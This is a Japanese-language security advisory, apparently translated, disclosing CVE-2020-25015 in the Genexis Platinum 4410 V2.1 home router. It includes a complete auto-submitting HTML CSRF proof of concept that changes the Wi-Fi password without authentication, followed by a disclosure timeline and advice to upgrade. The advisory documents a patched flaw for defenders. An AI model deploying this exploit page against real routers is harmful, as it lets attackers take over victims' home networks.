ネットワークセキュリティー
 Computer >> コンピューター >  >> ネットワーキング >> ネットワークセキュリティー

Genexis Platinum 4410 Router V2.1 でアクセス制御と CSRF が壊れている

Genexis Platinum 4410 ホーム ルーター バージョン 2.1 (ソフトウェア バージョン P4410-V2-1.28) をテストしているときに、ルーターが Broken Access Control と CSRF に対して脆弱であることがわかりました。

CVE ID: CVE-2020-25015

まとめ

Platinum 4410 は、家庭で一般的に使用されている Genexis のコンパクトなルーターです。ハードウェア バージョン V2.1 – ソフトウェア バージョン P4410-V2-1.28 は、WIFI アクセス ポイントのパスワードをリモートで変更するために組み合わせることができる、Broken Access Control および CSRF に対して脆弱であることが判明しました。

CSRF の詳細については、こちらの記事をご覧ください。

影響

攻撃者は被害者にリンクを送信できます。攻撃者が脆弱なルーターから確立された WIFI ネットワークに接続しているときにクリックすると、CSRF エクスプロイトによって WIFI アクセス ポイントのパスワードが変更されます。ルーターはBroken Access Controlに対しても脆弱であるため、被害者はルーターのWebベースの設定ページ(192.168.1.1)にログインする必要がなく、基本的にワンクリックでハッキングされます.

脆弱性

理想的には、CSRF 攻撃が成功するには、被害者が攻撃を受けているアプリケーション (この場合は 192.168.1.1 の Web ベースのセットアップ ページ) にログインする必要があるため、この攻撃は厄介です。ルーター設定ページは、ユーザー セッションを自動的に終了します。さらに、お客様がルーターの設定ページにもアクセスすることはめったにありません。ただし、報告時のファームウェアの最新バージョンにはアクセス制御の脆弱性が壊れているため、パスワードを変更する要求は、認証されていない当事者によっても送信される可能性があります。

したがって、このバージョンのファームウェアで CSRF と Broken Access Control の脆弱性を組み合わせることで、攻撃者は次のコードを含む HTML ドキュメントを作成し、ユーザーにそれを送信するように仕向けることができます。

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
 <form action="https://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
 <input type="hidden" name="wlEnbl" value="ON" />
 <input type="hidden" name="hwlKeys0" value="" />
 <input type="hidden" name="hwlKeys1" value="" />
 <input type="hidden" name="hwlKeys2" value="" />
 <input type="hidden" name="hwlKeys3" value="" />
 <input type="hidden" name="hwlgMode" value="9" />
 <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
 <input type="hidden" name="hwlEnbl" value="1" />
 <input type="hidden" name="hWPSMode" value="1" />
 <input type="hidden" name="henableSsid" value="1" />
 <input type="hidden" name="hwlHide" value="0" />
 <input type="hidden" name="isInWPSing" value="0" />
 <input type="hidden" name="WpsConfModeAll" value="7" />
 <input type="hidden" name="WpsConfModeNone" value="0" />
 <input type="hidden" name="hWpsStart" value="0" />
 <input type="hidden" name="isCUCSupport" value="0" />
 <input type="hidden" name="SSIDPre" value="N&#47;A" />
 <input type="hidden" name="bwControlhidden" value="0" />
 <input type="hidden" name="ht&#95;bw" value="1" />
 <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
 <input type="hidden" name="wlChannel" value="0" />
 <input type="hidden" name="wlTxPwr" value="1" />
 <input type="hidden" name="wlSsidIdx" value="0" />
 <input type="hidden" name="SSID&#95;Flag" value="0" />
 <input type="hidden" name="wlSsid" value="JINSON" />
 <input type="hidden" name="wlMcs" value="33" />
 <input type="hidden" name="bwControl" value="1" />
 <input type="hidden" name="giControl" value="1" />
 <input type="hidden" name="enableSsid" value="on" />
 <input type="hidden" name="wlAssociateNum" value="32" />
 <input type="hidden" name="wlSecurMode" value="WPAand11i" />
 <input type="hidden" name="wlPreauth" value="off" />
 <input type="hidden" name="wlNetReauth" value="1" />
 <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
 <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
 <input type="hidden" name="wlWpaGtkRekey" value="" />
 <input type="hidden" name="wlRadiusIPAddr" value="" />
 <input type="hidden" name="wlRadiusPort" value="" />
 <input type="hidden" name="wlRadiusKey" value="" />
 <input type="hidden" name="wlWpa" value="TKIPAES" />
 <input type="hidden" name="wlKeyBit" value="64" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="WpsActive" value="0" />
 <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
 <input type="hidden" name="pinvalue" value="" />
 <input type="hidden" name="Save&#95;Flag" value="1" />
 <input type="submit" value="Submit request" />
 </form>
 <script>
 document.forms[0].submit();
 </script>
 </body>
</html>

被害者が影響を受けたルーターによって確立された WiFi アクセス ポイントに接続されている限り、アクセス ポイントのパスワードは下のビデオに示すように変更されます。

タイムライン

  • 2020 年 8 月 28 日に Genexis チームに報告された脆弱性
  • チームは、2020 年 9 月 14 日に修正を含むファームウェアのリリースを確認しました

おすすめ

  • Genexis チームによると、お客様は最新のファームウェアにアクセスするために ISP に連絡する必要があります。
  • ファームウェアをアップグレードできない場合は、より安全なルーターを使用してください。

参照

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
  • https://nvd.nist.gov/vuln/detail/CVE-2020-25015


  1. Belkin ルーターで WI-FI アクセスがない

    Belkin ルーターの WI-FI アクセスを使用してインターネットにアクセスすることはできません。 Belkin Router という用語は、世界で最も信頼されているルーター ブランドです。通常、n 個のデバイスに高速でスムーズなワイヤレス接続を提供します。 しかし最近では、Belkin ルーターを介して WI-FI にアクセスできないことが確認されています。この記事では、Belkin ルーターで WI-FI にアクセスする方法に関する完全なガイドを入手します。これがあなたがしなければならないことです。 Belkin Router への正常な接続は、主に Windows で構成されたネ

  2. Belkin ルーターで WI-FI アクセスがない

    Belkin ルーターの WI-FI アクセスを使用してインターネットにアクセスすることはできません。 Belkin Router という用語は、世界で最も信頼されているルーター ブランドです。通常、n 個のデバイスに高速でスムーズなワイヤレス接続を提供します。 しかし最近では、Belkin ルーターを介して WI-FI にアクセスできないことが確認されています。この記事では、Belkin ルーターで WI-FI にアクセスする方法に関する完全なガイドを入手します。これがあなたがしなければならないことです。 Belkin Router への正常な接続は、主に Windows で構成されたネ